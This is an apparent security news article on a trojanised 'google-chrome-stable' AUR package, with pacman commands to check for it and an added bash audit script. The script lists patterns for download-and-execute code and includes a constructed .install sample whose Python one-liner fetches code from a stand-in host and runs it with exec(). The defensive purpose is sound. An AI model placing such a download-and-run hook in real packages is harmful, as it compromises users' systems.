The Arch User Repository (AUR) is a powerful community-driven resource for Arch Linux users, offering access to a vast range of software through user-submitted PKGBUILDs. However, this openness also creates an opportunity for malicious actors to exploit unsuspecting users.
Just weeks after a Remote Access Trojan (RAT) was discovered hidden inside browser-related packages, a new fake package mimicking Google Chrome has surfaced with another RAT embedded.
What Happened
A package named google-chrome-stable was recently uploaded to the AUR by a newly registered user named “forsenontop”. The account had no other contributions, raising immediate red flags within the community.
The package used a malicious .install script, which executed a Python command to download and run remote code silently in the background every time the Chrome browser was launched. This behavior made it a stealthy threat with no visible symptoms to the user.
The infection method is similar to a previous case where RAT payloads were distributed using GitHub links embedded inside the PKGBUILD file.
The suspicious behavior was flagged by a vigilant user, and the AUR team responded promptly by removing the package from the repository.
How to Check If You’re Affected
If you’ve recently installed or updated packages related to Google Chrome from the AUR, it’s crucial to check your system immediately.
To verify if the malicious package is installed, run:
pacman -Qs google-chrome-stable
If the package is present, remove it without delay:
sudo pacman -Rns google-chrome-stable
Also, scan your system for any lingering malicious scripts or abnormal Python processes.
Stay Safe: Tips for Arch Users
This incident underscores the need for extra caution when using the AUR. Here are a few best practices to follow:
Inspect PKGBUILDs manually before installing, especially for new or obscure packages.
Avoid packages submitted by new or inactive users with no reputation.
Update your system regularly to benefit from security patches.
Enable a firewall and AppArmor/SELinux where possible.
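One way to support the manual inspection recommended above, as an added example that is not part of the original article: a shell function that flags lines in a PKGBUILD and its .install scripts that download or execute code. The function name, the pattern list and the sample files are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: heuristic pre-build review of an AUR package directory.
# The pattern list is an illustrative assumption, not a complete signature set;
# a clean result does not replace reading the files.
AUR_REVIEW_PATTERNS='(curl|wget)[^|;]*[|][[:space:]]*(ba|z)?sh
python[0-9.]*[[:space:]]+-c
urllib|urlopen|requests[.]get
base64[[:space:]]+(-d|--decode)
(^|[^[:alnum:]_])(eval[[:space:](]|exec[(])
nohup|disown'

# audit_aur_dir DIR
# Prints "file:line:text" for every flagged line in PKGBUILD and *.install.
# Returns 0 if nothing was flagged, 1 if something was, 2 if DIR has no PKGBUILD.
audit_aur_dir() {
    local dir=$1 f flagged=0
    if [ ! -f "$dir/PKGBUILD" ]; then
        echo "audit_aur_dir: no PKGBUILD in $dir" >&2
        return 2
    fi
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue          # the *.install glob may match nothing
        if grep -HnE -e "$AUR_REVIEW_PATTERNS" "$f"; then
            flagged=1
        fi
    done
    return "$flagged"
}

# Constructed samples (not the contents of the real package).
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir "$demo/clean" "$demo/bad"
printf 'pkgname=example\npkgver=1.0\nsource=("https://example.org/example-1.0.tar.gz")\n' \
    > "$demo/clean/PKGBUILD"
cp "$demo/clean/PKGBUILD" "$demo/bad/PKGBUILD"
printf 'install=example.install\n' >> "$demo/bad/PKGBUILD"
cat > "$demo/bad/example.install" <<'EOF'
post_install() {
    python -c "import urllib.request as u; exec(u.urlopen('https://example.invalid/x').read())"
}
EOF

audit_aur_dir "$demo/clean" && echo "clean: nothing flagged"
audit_aur_dir "$demo/bad" || echo "bad: read the flagged lines before running makepkg"
```

Run it against the directory an AUR helper or git clone produced, before building. Flagged lines are prompts for reading, since legitimate packages can also trip a pattern.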
The Arch community’s quick response helped limit the impact of this fake google-chrome-stable package, but it’s a reminder that trust and transparency are essential in open-source ecosystems.
As the AUR grows, so do the risks. Always verify, review, and install responsibly.

